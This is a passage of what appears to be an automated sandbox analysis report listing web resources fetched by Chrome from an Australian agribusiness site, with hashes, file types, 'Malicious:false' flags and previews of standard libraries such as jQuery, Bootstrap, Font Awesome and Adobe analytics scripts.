                                                                                                                                                                                                            SSDEEP:192:Zr4arfo91Mr8MfmNWtznjryEFh7GN3QTAJP1MlWrZXZ+Z6wrfr5:ZrbrUMrbf6Mznjr9h7ymlWrZsZ6wrfr5
                                                                                                                                                                                                            MD5:899004CC02C33EFC1F6694B1AEE587FD
                                                                                                                                                                                                            SHA1:8289B588E9944EBD754974D806E8BB5EE5489961
                                                                                                                                                                                                            SHA-256:377E9731DF07066631DC615291A3DBDBC923893629702F2E3B9B7A5775CC027B
                                                                                                                                                                                                            SHA-512:0EA82629AEFE013CF820CFD09544FDD8A782CA67067C101AC59238336A88C3A16000AA123B81E973D88E63763E365534C9757D906ACD48CFD12C7464EBF49BB5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js
                                                                                                                                                                                                            Preview:(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).Sling=c()})(function(){return{SELECTOR_INFINITY:".infinity",CHARSET:"_charset_",STATUS:":status",STATUS_BROWSER:"browser",OPERATION:":operation",OPERATION_DELETE:"delete",OPERATION_MOVE:"move",DELETE_SUFFIX:"@Delete",TYPEHINT_SUFFIX:"@TypeHint",COPY_SUFFIX:"@CopyFrom",MOVE_SUFFIX:"@MoveFrom",ORDER:":order",REPLACE:":replace",DESTINATION:":dest",SAVE_PARAM_PREFIX:":saveParamPrefix",IGNORE_PARAM:":ignore",.REQUEST_LOGIN_PARAM:"sling:authRequestLogin",LOGIN_URL:"/system/sling/login.html",LOGOUT_URL:"/system/sling/logout.html"}});.(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).Util=c()})(function(){return{patchText:function(c,h){if(h)if("[object Array]"!==Object.prototype.toString.call(h))c=c.replace("{0}",h);else for(var e=0;e<h.length;e++)c=c.replace("{"+e+"}",h[e]);return c},getTopWindow:function(){var c=window;if(this
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3772
                                                                                                                                                                                                            Entropy (8bit):3.834088123858926
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:x0h5r8869TkYp9e9oCvMA5lu/uNiPF/r7I1Ga0pFby:x0npGJkZ5A/uIxrsF0pFby
                                                                                                                                                                                                            MD5:68D8392693D2E3F169888BD1BE9621D9
                                                                                                                                                                                                            SHA1:90952E7C090EF318567B562D22A5FB8B26388321
                                                                                                                                                                                                            SHA-256:5285194B6175B6C2FD8A83876A24FBB20611FF80899323CBDF4A9DD4DE1F60CA
                                                                                                                                                                                                            SHA-512:2EC9AF1D78034D45CBC15303CC830E34690141EFADF9D30D5D0C1F7786032EA074CACAC14B023317E9508EE8DBC0C3F7F205E8CE8AE6E64E29F3856D174C6A4B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:<svg width="76" height="22" viewBox="0 0 76 22" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M75.1241 9.3767C73.9109 9.01801 73.1197 8.98636 72.2018 8.99691C71.1257 9.01801 70.2184 9.25011 69.48 9.64045C68.5516 9.07076 67.4966 8.90196 66.737 8.99691C65.9247 9.10241 65.049 9.44001 64.2367 10.0413C63.7197 9.45056 63.5298 9.27121 63.0023 9.09186C61.9052 8.73316 60.6814 9.37671 59.964 10.1996L55.6702 14.6622C55.5014 14.831 55.3432 14.9892 55.1744 15.1475L55.1427 15.1686C53.2754 16.9409 51.5874 18.1542 49.1504 18.4601C46.0065 18.861 44.8672 16.5506 48.5807 13.2063C50.4269 11.55 51.7246 11.4023 52.2837 11.7082C53.1488 12.1724 52.9167 13.4806 48.9077 15.2846C48.4858 15.4745 47.9161 15.7277 48.1271 16.7405C48.2009 17.0992 48.5385 17.2574 48.9394 17.1941C49.1504 17.1625 49.2981 17.1097 49.4141 17.0781C53.0538 15.7805 54.4042 13.776 54.8051 13.0586C55.3432 12.1091 55.4592 10.8326 54.5941 9.89365C53.6657 8.90196 50.6063 8.21622 46.9138 10.8326C44.5612 12.4995 42.5356 14.7677 42.0714 1
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (61608)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):61893
                                                                                                                                                                                                            Entropy (8bit):5.140561960215685
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:NsO4MAvAcCfFvM6aPMPv3Mo8ExbxHTVCLXMrJ3u6byVm7MT2NIbjyixM3XpZWVe8:NDaWkNo9s3Ccd
                                                                                                                                                                                                            MD5:FC0AE1E61D12D522D67E845F4BDEBDF4
                                                                                                                                                                                                            SHA1:961BA292AC8C68C7383956C7CBCD929CAF64BD24
                                                                                                                                                                                                            SHA-256:1BBDB19132CECE5103C0A2919E09320EDC6687AB3879FC3BB1D28F0F0FA5D45F
                                                                                                                                                                                                            SHA-512:9A9DD578CA6E14A6E0C66FD731453841051C257E0065F5797AC817EF6250AFB1FBCD6BAC57A94B3F54BBF306675F6CFD770BF2C22975547907640A9F18E5BB37
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta3/dist/js/bootstrap.min.js
                                                                                                                                                                                                            Preview:/*!. * Bootstrap v5.0.0-beta3 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e(require("@popperjs/core")):"function"==typeof define&&define.amd?define(["@popperjs/core"],e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e(t.Popper)}(this,(function(t){"use strict";function e(t){if(t&&t.__esModule)return t;var e=Object.create(null);return t&&Object.keys(t).forEach((function(s){if("default"!==s){var i=Object.getOwnPropertyDescriptor(t,s);Object.defineProperty(e,s,i.get?i:{enumerable:!0,get:function(){return t[s]}})}})),e.default=t,Object.freeze(e)}var s=e(t);const i=t=>{do{t+=Math.floor(1e6*Math.random())}while(document.getElementById(t));return t},n=t=>{let e=t.getAttribute("data-bs-target");if(!e||"#"===e){let s=t.getAttribut
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (30837)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):31000
                                                                                                                                                                                                            Entropy (8bit):4.746143404849733
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:wHu5yWeTUKW+KlkJ5de2UYDyVfwYUas2l8yQ/8dwmaU8G:wwlr+Klk3Yi+fwYUf2l8yQ/e9vf
                                                                                                                                                                                                            MD5:269550530CC127B6AA5A35925A7DE6CE
                                                                                                                                                                                                            SHA1:512C7D79033E3028A9BE61B540CF1A6870C896F8
                                                                                                                                                                                                            SHA-256:799AEB25CC0373FDEE0E1B1DB7AD6C2F6A0E058DFADAA3379689F583213190BD
                                                                                                                                                                                                            SHA-512:49F4E24E55FA924FAA8AD7DEBE5FFB2E26D439E25696DF6B6F20E7F766B50EA58EC3DBD61B6305A1ACACD2C80E6E659ACCEE4140F885B9C9E71008E9001FBF4B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
                                                                                                                                                                                                            Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 30 x 31, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2373
                                                                                                                                                                                                            Entropy (8bit):6.9051491035012305
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:9Ra4knA9WIrCcOzZt091Anz3rDc3HKy309RJHdjEeSyL3dXXdbP1riiP4GhTeNb:93knmWIrCzZWnBHKj3JHdjv3d9bEixTI
                                                                                                                                                                                                            MD5:ED1B1A7DDF5060212D592E5105F8B197
                                                                                                                                                                                                            SHA1:460355D491FDEAF93A6549B40EB426B9E27D9F1D
                                                                                                                                                                                                            SHA-256:564DEFC382B32EDEC8C768509535C12EE88121B419D5B16C07F281DE92FA6599
                                                                                                                                                                                                            SHA-512:09394873ADF78A8A483D0EF582EE567476271C9125C0C77B12D693A5C831D72746796DA41B257113FF9FE6A49F010520C6B8B04F40EA7D0382FA1888F8623C99
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:.PNG........IHDR..............l}.....pHYs..2...2..(dZ.....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 137.da4a7e5, 2022/11/27-09:35:03 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmp:CreateDate="2023-01-27T17:24:54+10:30" xmp:ModifyDate="2023-01-27T17:36:46+10:30" xmp:MetadataDate="2023-01-27T17:36:46+10:30" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:965dcbe0-aadc-a34e-840f-84c2126aec49" xmpMM:DocumentID="adobe:docid:photoshop:1149732c-1da8-364c-90fb-7ef8f325988c" xmpMM:OriginalDocumentID="xmp.did:bcbcf
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):510
                                                                                                                                                                                                            Entropy (8bit):4.497462332670602
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:trVmvAuCwSNxLXOO5NJLsZlHkrZMzP8hpGcq+:tZm4uaNUTGMrBcq+
                                                                                                                                                                                                            MD5:73B4C1811F61B251388096354D1F301A
                                                                                                                                                                                                            SHA1:D8392C6B64CDA5BD49D9317693B623E3CB9DAE50
                                                                                                                                                                                                            SHA-256:2E81C317E3C07984BDE4B9377CC1E341E2368FB2E73A7E008C099D0BEB2F258F
                                                                                                                                                                                                            SHA-512:7D377F12A7BC974B1E8D131183D3FBBB3595C57BA17601C96D0DEB447D283A85281872B82B7797C5D6D7D13F72DF4A96FBB4A6896CBF2E7CF992C456EFC639FC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:<svg width="12" height="20" viewBox="0 0 12 20" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M11.1454 0.222218C11.3642 0.222218 11.5826 0.302565 11.7497 0.463673C12.0834 0.785475 12.0834 1.30712 11.7497 1.62892L2.95207 10.1112L11.7497 18.5934C12.0834 18.9152 12.0834 19.4368 11.7497 19.7586C11.4159 20.0805 10.8749 20.0805 10.5411 19.7586L1.13921 10.6938C0.805448 10.372 0.805448 9.85034 1.13921 9.52854L10.5411 0.463673C10.7082 0.302565 10.9266 0.222218 11.1454 0.222218Z" fill="#9E9FA2"/>.</svg>.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (32755)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):36178
                                                                                                                                                                                                            Entropy (8bit):5.31962188524243
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:wYRKHdumNd/M2r+VVXJrk6Hx372qDgDsVKg7CUgBFmY7K:wfdu+d/76vXKSySGbK
                                                                                                                                                                                                            MD5:D8232F86C8016A8E0ACAA7ECFDF72B3E
                                                                                                                                                                                                            SHA1:C21FB1EF9E07FBF03A08C152DC0C1B755D42C475
                                                                                                                                                                                                            SHA-256:B3BCE010C0F5A7C24A82AE511194BAF67BF8C2CEE737A3A118F6B9590D322B15
                                                                                                                                                                                                            SHA-512:84685AF6B7939E75D0CDF62D370B364C1A4FF67485B8A03646E60D669B4B5A6B86E10BDB97FF466B7C8310E1F09597F517F65126B1B9979C8E3B9E5DE910BD43
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement.min.js
                                                                                                                                                                                                            Preview:// For license information, see `https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement.js`..function AppMeasurement(e){var t=this;t.version="2.27.0";var n,a,i=window;i.s_c_in||(i.s_c_il=[],i.s_c_in=0),t._il=i.s_c_il,t._in=i.s_c_in,t._il[t._in]=t,i.s_c_in++,t._c="s_c";try{n=i.AppMeasurement,(a=n.Cc)||(a=null)}catch(e){}var r,o,c,s=i;try{for(r=s.parent,o=s.location;r&&r.location&&o&&""+r.location!=""+o&&s.location&&""+r.location!=""+s.location&&r.location.host===o.host;)r=(s=r).parent}catch(e){}t.log=function(e){try{console.log(e)}catch(e){}},t.bb=function(e){return""+parseInt(e)==""+e},t.replace=function(e,t,n){return!e||0>e.indexOf(t)?e:e.split(t).join(n)},t.escape=function(e){var n,a;if(!e)return e;for(e=encodeURIComponent(e),n=0;7>n;n++)a="+~!*()'".substring(n,n+1),0<=e.indexOf(a)&&(e=t.replace(e,a,"%"+a.charCodeAt(0).toString(16).toUpperCase()));return e},t.unescape=function(e){if(!e)return e;e=0<=e.indexOf("+")?t.replace(e,"+"," "):e;try{return de
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (1653)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1800
                                                                                                                                                                                                            Entropy (8bit):5.527858380938343
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:h6bLt/B26bBfdwSKKWA8PGdwSKKXAIOP/B:h2BB2qCRFPPJRcxOP/B
                                                                                                                                                                                                            MD5:28400EE7BA0A3A5E5EE5C09C1F2E6353
                                                                                                                                                                                                            SHA1:A1AE59765A3FC0AE93F564489AE1BE7F8D9F83B6
                                                                                                                                                                                                            SHA-256:A2AEDBF833ED5A8601653D379C6B33EB4A8177DD1DB4302B8BDC372DAC7B8C80
                                                                                                                                                                                                            SHA-512:1E62957340D27B6AEAB6A579DF984512090E27972264B2BDA68E0EFF7646EDA96D8EC802216AE910CFEC46226B18278FB18660231C9B6C952C37FD40D7C7E79F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567c-source.min.js
                                                                                                                                                                                                            Preview:// For license information, see `https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567c-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567c-source.min.js', "<script>\nconsole.log('Global | Ad Pixel Started');\n</script>\n\n Meta Pixel Code -->\n<script>\n!function(f,b,e,v,n,t,s)\n{if(f.fbq)return;n=f.fbq=function(){n.callMethod?\nn.callMethod.apply(n,arguments):n.queue.push(arguments)};\nif(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';\nn.queue=[];t=b.createElement(e);t.async=!0;\nt.src=v;s=b.getElementsByTagName(e)[0];\ns.parentNode.insertBefore(t,s)}(window, document,'script',\n'https://connect.facebook.net/en_US/fbevents.js');\nfbq('init', '842278510644971');\nfbq('track', 'PageView');\n</script>\n<noscript><img height=\"1\" width=\"1\" style=\"display:none\"\nsrc=https://www.facebook.com/tr?id=842278510644971&ev=PageView&noscript=1\n
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):198
                                                                                                                                                                                                            Entropy (8bit):5.01142858375393
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:tRBRNq8Ns+IjSKcvSuXF4q7SLvDmJS4RKb58FNQrFuHrQddQ1Eo6GSyrJVAej+Kh:tnrrzSuzumc4slZRIkfEJVRnGhk5
                                                                                                                                                                                                            MD5:9D9473FD130B0A7C6B8E9AF9E592519B
                                                                                                                                                                                                            SHA1:0C03C3B2C9895B24902BF0E56B4DCBBEAB3623AF
                                                                                                                                                                                                            SHA-256:DC4EE6726A4F0D64C20C6C287B4D05A81462E66D4CCE140DDF74041CC86CEC36
                                                                                                                                                                                                            SHA-512:7DF3656954DD331CA2ADAF0EFFF513B9F74FB05D3E2FEE76A940C7574CA62FB0CEE6F7698AC1EE2BE6D9ED9D089B7EEAED7049BF59C82EE2B32CA3221732CB11
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:<svg width="7" height="12" viewBox="0 0 7 12" fill="none" xmlns="http://www.w3.org/2000/svg">. <path d="M5.05885 6L0 1.10035L1.13634 0L7 6L1.13634 12L0 10.8997L5.05885 6Z" fill="#D21E24"/>.</svg>
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 384 x 384, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12378
                                                                                                                                                                                                            Entropy (8bit):7.909076338338389
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Muvw/P18FkjHOnr8TLhMOEJRm4Z4NBSQoeydWcKFkj:M7d82jHOnrkSzJRuNIReywF4
                                                                                                                                                                                                            MD5:1D137F6E42BD3F8A9482EAFB0C92D735
                                                                                                                                                                                                            SHA1:2A06B145558B7DB2502F7DB1FF0DBEA57E8F92E0
                                                                                                                                                                                                            SHA-256:448CA01DBDB41B4957CFF33D67FB0743EE954D78ACA68670F08851096626A95F
                                                                                                                                                                                                            SHA-512:9FA0FB01BDC3BA93D6D67292F8174CE7647F318105BC39B53829087C105661C286A304125A52800DAC6F88EC80686777FFDBEEDF8FF17610C46E51506FE144C6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:.PNG........IHDR....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME.....)4*6.p../^IDATx...w..U.....I..{i...".."E.....kA]{.E..W...Z.w.U,....*..H....d...H......y|TH2.sN..9...C..U...9.34p..,....T.R....@Y.."........Z...V.....h`q0.wf....!LV...T....K...5....x..RZj,..oq..(.d..-..t(...+..s.i,=.#v...$B..j....F.5... iE..G[..X..jjL.H....g...z...)..`{%...K..../"ixp..x.Z^.........)....\.t&....l..F[.Sy.........*s...F.O"........".....0T@_,w..5vD$K.....^H. H..(........H.[b..2..R.......)..46D$G...?o.3r2.lm..o..c.;..x......\...O..e)..P....e.......pqp._'{.NR..!PT...2J._D....2....,.e..`{>...Ht......).8.\!K.f......|../".WG.0%T..Y...|n....U."".T..>..sk.7..S@...|...P......B.H."s...[.J......DD.2".G....i......e.p..MD..S..=.&.m.....|..........G...5i.....!.Q.>"".23h.f6.....W@.&.B.>S...I..B..mu*.E.X...3.CG...H.+...a.... ...}DD..@.P>/.4.B..~./"....{.X.....s.....~..I....ldh..`[.u].T..._D$..E..., ..) .y.e....HZ...{..R8..(..^.sO
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):437
                                                                                                                                                                                                            Entropy (8bit):7.209188484403921
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:6v/74/6Ts/whG2m9i7mtJT4RWbKwys5fmBwKRApTjG8Nw5DcF7:x/6O87+ThKwd5uBVR+j3CM
                                                                                                                                                                                                            MD5:718699785E49839E7D63CAFDDBF2F469
                                                                                                                                                                                                            SHA1:C1C2259187A940868B282B8A6CC3C126D60E1F53
                                                                                                                                                                                                            SHA-256:5A4AC3FA5B56A020D0AA16E532DFA437F1FA0BFD8DD476762C2E8EAA763F1D68
                                                                                                                                                                                                            SHA-512:AEF07610A6D4680CB4DC5105985AD1463D5414B7EEAE46FB39B19B47807C68E562CF291D548FEC9AD5D34B8E6E42AA617DD7FD0315D7FD6EA917994DACAC5604
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/content/dam/eld/icons---logos/icons/social-share/youtube.png
                                                                                                                                                                                                            Preview:.PNG........IHDR..............w=.....pHYs.................sRGB.........gAMA......a....JIDATx..1N.A....V..&.`.....'...7..N..G..[p.T .CK5..!...[.J.2.i._3/.?.eg...{J.u.eYZ..]0#%.......o...2....z..X...c..<..Q.;.t'....Z.+..G..C...9"....w.X..YP..H_..P.R.!+..?....(..i.2...^{..0...r.\j.?.e.$(...cy#@^.=@ .=..z.Z......&.h.].sW....l'.k..B0..{ ...Z.h.H.?.N.O..w.Kf..^?......`...d2|.xp.i..l.......L7]WI..3.yE.A...g|...r.4..$....IEND.B`.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):89501
                                                                                                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js
                                                                                                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (538)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8529
                                                                                                                                                                                                            Entropy (8bit):5.53641559082188
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Zr4arfo91Mr8MfmNWtznjryEFh7GN3QTAJP1MlWrZXZ+Z6wrfr5:ZrbrUMrbf6Mznjr9h7ymlWrZsZ6wrfr5
                                                                                                                                                                                                            MD5:899004CC02C33EFC1F6694B1AEE587FD
                                                                                                                                                                                                            SHA1:8289B588E9944EBD754974D806E8BB5EE5489961
                                                                                                                                                                                                            SHA-256:377E9731DF07066631DC615291A3DBDBC923893629702F2E3B9B7A5775CC027B
                                                                                                                                                                                                            SHA-512:0EA82629AEFE013CF820CFD09544FDD8A782CA67067C101AC59238336A88C3A16000AA123B81E973D88E63763E365534C9757D906ACD48CFD12C7464EBF49BB5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).Sling=c()})(function(){return{SELECTOR_INFINITY:".infinity",CHARSET:"_charset_",STATUS:":status",STATUS_BROWSER:"browser",OPERATION:":operation",OPERATION_DELETE:"delete",OPERATION_MOVE:"move",DELETE_SUFFIX:"@Delete",TYPEHINT_SUFFIX:"@TypeHint",COPY_SUFFIX:"@CopyFrom",MOVE_SUFFIX:"@MoveFrom",ORDER:":order",REPLACE:":replace",DESTINATION:":dest",SAVE_PARAM_PREFIX:":saveParamPrefix",IGNORE_PARAM:":ignore",.REQUEST_LOGIN_PARAM:"sling:authRequestLogin",LOGIN_URL:"/system/sling/login.html",LOGOUT_URL:"/system/sling/logout.html"}});.(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).Util=c()})(function(){return{patchText:function(c,h){if(h)if("[object Array]"!==Object.prototype.toString.call(h))c=c.replace("{0}",h);else for(var e=0;e<h.length;e++)c=c.replace("{"+e+"}",h[e]);return c},getTopWindow:function(){var c=window;if(this
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (474)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):109931
                                                                                                                                                                                                            Entropy (8bit):4.717833542014338
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:VmjA0bi0UH0uMP5Mmhm6/mFah0nNRva1LMf4fU353ohNjN70dYq4G/ekVxQm4G0Q:YjDizH0Sah0nNR8Vs4G/BxMBQ
                                                                                                                                                                                                            MD5:05C3E7E7BA74B97802B32C6781212A24
                                                                                                                                                                                                            SHA1:90D578388B9EBFC83895B9533A9D15B8E537E108
                                                                                                                                                                                                            SHA-256:28348FEF6CB0ED8B2CEEB22DEAF824428FD13875D84C73D38F77DD216FC24E7F
                                                                                                                                                                                                            SHA-512:60523A0A168F439847F68F10E27E59CC31EB86BC19DDD860652436242FE982662E0F442D1B48B04207C56B527EA388EF925B0A06EA5C1F3E53C75CAA6B6E4515
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
